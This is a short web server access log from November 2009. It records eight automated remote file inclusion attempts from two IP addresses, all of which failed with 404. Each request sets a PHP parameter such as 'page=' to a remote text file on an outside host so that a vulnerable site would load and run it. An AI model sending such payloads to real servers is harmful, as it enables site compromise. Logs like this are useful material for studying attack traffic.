195.13.191.76 - - [01/Nov/2009:01:26:12 -0500] "GET /errors.php?error=http://0pop.com/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.149.216.70 - - [01/Nov/2009:01:26:16 -0500] "GET /senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:26:16 -0500] "GET /logs/access_log.Q109071700%20%20/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:26:16 -0500] "GET /senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:26:16 -0500] "GET /logs/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:26:16 -0500] "GET /logs/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:26:16 -0500] "GET /logs/access_log.Q109071700%20%20/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:26:22 -0500] "GET /logs/access_log.Q109081600%20%20/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
